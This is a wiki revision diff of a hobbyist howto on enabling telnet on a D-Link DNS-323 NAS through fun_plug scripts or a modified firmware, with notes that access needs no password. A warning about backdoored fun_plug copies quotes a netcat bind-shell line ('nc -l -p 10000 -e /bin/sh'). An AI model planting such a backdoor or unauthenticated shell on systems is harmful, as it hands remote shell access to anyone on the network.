Differences
This shows you the differences between the selected revision and the current version of the page.
howto:telnet 2008/05/12 22:10 | howto:telnet 2017/09/06 18:38 current | ||
---|---|---|---|
Line 1: | Line 1: | ||
====== Enabling Telnet ====== | ====== Enabling Telnet ====== | ||
- | Before you even try this, please be :!: **WARNED** :!: that using telnet to your DNS-323 you can very easily <hi #ffff00>[[wp>bricked|brick]]</hi> your unit. | + | Before you even try this, please be :!: **WARNED** :!: that using telnet to your DNS-323 you can very easily [[wp>bricked|brick]] your unit. |
+ | |||
+ | |||
+ | |||
+ | |||
+ | ===== Enabling Telnet without modifying the firmware ===== | ||
+ | An easy way to enable Telnet without modifying your firmware is to install Fonz funplug. (More info [[http://wiki.dns323.info/howto:ffp|here]]). You can rollback your changes (and remove telnet access) later on by simply removing Fonz funplug files and reboot. | ||
+ | |||
+ | It is commonly accepted that you can't harm your device this way (you still should know what you do when using telnet). | ||
+ | |||
+ | Be aware that anyone can login with the username "nobody" with no password. Also true using "admin" and no password if you have not set up a password for the admin web page. For best results just use telnet to enable ssh and disable telnet after that. | ||
+ | |||
+ | ===== Modified firmware with telnet access ===== | ||
+ | I ([[http://pedro.larroy.com|piotr]]) used [[howto:custom_firmware|Helge's instructions to build firmwares]] in order to modify Dlink's firmware version 1.05. Currently it adds telnet access on port 23 **without password authentication**. You can download and reflash via the web interface. Only telnet is added, the rest of the firmware functionality is left intact. | ||
+ | |||
+ | This allows you to do filesystem checks since running telnet from the ramdisk allows the raid/hard disks to be umounted, just umount them and run e2fsck.\\ | ||
+ | |||
+ | \\ | ||
+ | [[http://pedro.larroy.com/files/FrodoII-firmware|modified DNS323 1.05 firmware with telnet access]]\\ | ||
+ | [[http://pedro.larroy.com/files/FrodoII-firmware.md5sum|md5]]\\ | ||
+ | |||
+ | Instructions:\\ | ||
+ | * Check the md5sum of the firmware you downloaded. (The firmware also embedded CRC, but better safe than sorry). | ||
+ | * Reflash your DNS323 using the web interface | ||
+ | * Wait at least **3 minutes** to be sure the unit is reflashed correctly | ||
+ | * If you enter via web interface and see the option to recreate the raid again, just **reboot** the unit with the power button so the old raid is recognised and run again. | ||
+ | * Now you can operate as normal, but port 23 should be open with telnet access | ||
+ | |||
+ | I like this method better than running as fun_plug since the latter causes the FS not to be cleanly umounted, leading to filesystem corruption over time. Dlink's firmware is really crappy, and doesn't check the filesystem. I have informed Dlink about this fact. | ||
+ | |||
+ | You should be able to go back to an official firmware using the web interface update. | ||
Line 19: | Line 49: | ||
# Uncomment next line if you want "proof of concept". | # Uncomment next line if you want "proof of concept". | ||
# A filem dmesg.out will be located on \\NAS\HDD_1 or | # A filem dmesg.out will be located on \\NAS\HDD_1 or | ||
- | # \\NAS\Volume_1 depnding on firmware version. | + | # \\NAS\Volume_1 depending on firmware version. |
# | # | ||
# dmesg > /mnt/HD_a2/dmesg.out | # dmesg > /mnt/HD_a2/dmesg.out | ||
Line 29: | Line 59: | ||
</code> | </code> | ||
+ | <code bash> | ||
+ | # | ||
+ | # The contents of starttelnet.sh itself | ||
+ | /mnt/HD_a2/lnx_bin/busybox3 mknod /dev/ptyp0 c 2 0 | ||
+ | /mnt/HD_a2/lnx_bin/busybox3 chmod 0666 /dev/ptyp0 | ||
+ | /mnt/HD_a2/lnx_bin/busybox3 mknod /dev/ttyp0 c 3 0 | ||
+ | /mnt/HD_a2/lnx_bin/busybox3 chmod 0666 /dev/ttyp0 | ||
+ | |||
+ | rm /mnt/HD_a2/lnx_bin/sh | ||
+ | ln -s /mnt/HD_a2/lnx_bin/busybox3 /mnt/HD_a2/lnx_bin/sh | ||
+ | /mnt/HD_a2/lnx_bin/utelnetd -l /mnt/HD_a2/lnx_bin/sh -d | ||
+ | </code> | ||
+ | |||
+ | Please take note that this is the minimal setup required to have Telnet enabled on the DNS-323. The minimal setup using this starttelnet.sh has a one major drawback that it operates directly from the installed HDD. This will prevent the filesystem from being unmounted which makes file system checks or the normal RAID rebuild procedure (automatic or manual from the web interface) impossible. The HDDs will still go to power save, though. | ||
+ | |||
+ | This will become a problem when the filesystem becomes corrupted, due to a power outage or other errors. | ||
+ | |||
+ | With Telnet running from the HDD filesystem, we cannot unmount /dev/md0 and therefore cannot run fsck /dev/md0, but we cannot run Fsck without Telnet, obviously. But we can copy the needed components to the RAMdisk and run Telnet from there: | ||
+ | |||
+ | <code bash> | ||
+ | # improved starttelnet.sh, enabling the filesystems to be unmounted and checked, if need be. | ||
+ | |||
+ | # copy the provided components to a directory on the ramdisk | ||
+ | # the ramdisk is regenerated with every boot, so the copy has no lasting effects at all | ||
+ | # simply copy the two files over | ||
+ | cp /mnt/HD_a2/lnx_bin/utelnetd /sbin/utelnetd | ||
+ | cp /mnt/HD_a2/lnx_bin/busybox3 /bin/busybox3 | ||
+ | |||
+ | # create the terminal device as usual | ||
+ | /bin/busybox3 mknod /dev/ptyp0 c 2 0 | ||
+ | /bin/busybox3 chmod 0666 /dev/ptyp0 | ||
+ | /bin/busybox3 mknod /dev/ttyp0 c 3 0 | ||
+ | /bin/busybox3 chmod 0666 /dev/ttyp0 | ||
+ | |||
+ | # make a shell link on the ramdisk | ||
+ | mkdir /bin/busybox3.dir/ | ||
+ | PATH="$PATH:/bin/busybox3.dir" | ||
+ | |||
+ | ln -s /bin/busybox3 /bin/busybox3.dir/sh | ||
+ | |||
+ | # and start the Telnet service from the ramdisk as well | ||
+ | /sbin/utelnetd -l /bin/busybox3.dir/sh -d | ||
+ | |||
+ | </code> | ||
+ | |||
+ | Now you can connect via Telnet and perform fsck without getting the error message "/dev/md0 is busy". (Note: samba is still sharing the HDD for your network, also preventing the HDD from being unmounted - but smb can be safely stopped or started from the Telnet console by issuing "smb stop" or "smb start".) | ||
+ | |||
+ | Updated 2009/12/06: The line <code>ln -s /bin/busybox3 /bin/busybox3.dir/sh</code> was missing from the above script. | ||
===== Download Telnet ===== | ===== Download Telnet ===== | ||
- | Next step is to dowload the files required. [[http://forum.dsmg600.info/profile.php?id=47|KRH]] kindly provided them for us and you can now download them from here: {{:howto:utelnet-kit.tar.gz}}. For Windows Users: :!: Dont use WinZIP - try WinRAR instead :!: | + | **WARNING** Be careful what you download. Some copies of fun_plug contain backdoors like using nc (netcat) to allow unauthenticated access to port 10000. Running netcat like this may cause the unmount problems described above. |
+ | E.g. | ||
+ | /mnt/HD_a2/nc -l -p 10000 -e /bin/sh & | ||
+ | |||
+ | Next step is to dowload the files required. [[http://dns323.kood.org/forum/profile.php?id=47|KRH]] kindly provided them for us and you can now download them from here: {{:howto:utelnet-kit.tar.gz}}. For Windows Users: :!: Dont use WinZIP - try 7-Zip or WinRAR instead :!: | ||
From this file, extract the following files: | From this file, extract the following files: | ||
Line 38: | Line 120: | ||
* utelnetd | * utelnetd | ||
* busybox3 | * busybox3 | ||
- | |||
===== Installing Telnet ===== | ===== Installing Telnet ===== | ||
- | When all files are extracted you need to install them. This can be achieved in several ways covered in the [[fun_plug]] howto. The most important is that the files resides on the first disc and in the following structure and that they have rights to //execute//. | + | When all files are extracted you need to install them. This can be achieved in several ways covered in the [[fun_plug]] howto. The most important is that the files reside on the first disc and in the following structure and that they have rights to //execute//. |
<code bash> | <code bash> | ||
Line 62: | Line 143: | ||
So; now you have a telnet access and want to do something with it. Maybe a [[chroot_debian|debian]] Sarge chroot system. Upgrade your [[firefly|iTunes server]] or make your ftp server working in a [[open_ports_ftpd|NAT]]'ed environment. You can even set-up your own [[wp>Web_server|WEB server]] using [[howto:lighttpd_php|lighttpd]]. | So; now you have a telnet access and want to do something with it. Maybe a [[chroot_debian|debian]] Sarge chroot system. Upgrade your [[firefly|iTunes server]] or make your ftp server working in a [[open_ports_ftpd|NAT]]'ed environment. You can even set-up your own [[wp>Web_server|WEB server]] using [[howto:lighttpd_php|lighttpd]]. | ||
- | But remember, always have //fun//, ;-), and be aware that you're now in a position where you can easily <hi #ffff00>[[wp>bricked|brick]]</hi> your unit. | + | But remember, always have //fun//, ;-), and be aware that you're now in a position where you can easily [[wp>bricked|brick]] your unit. |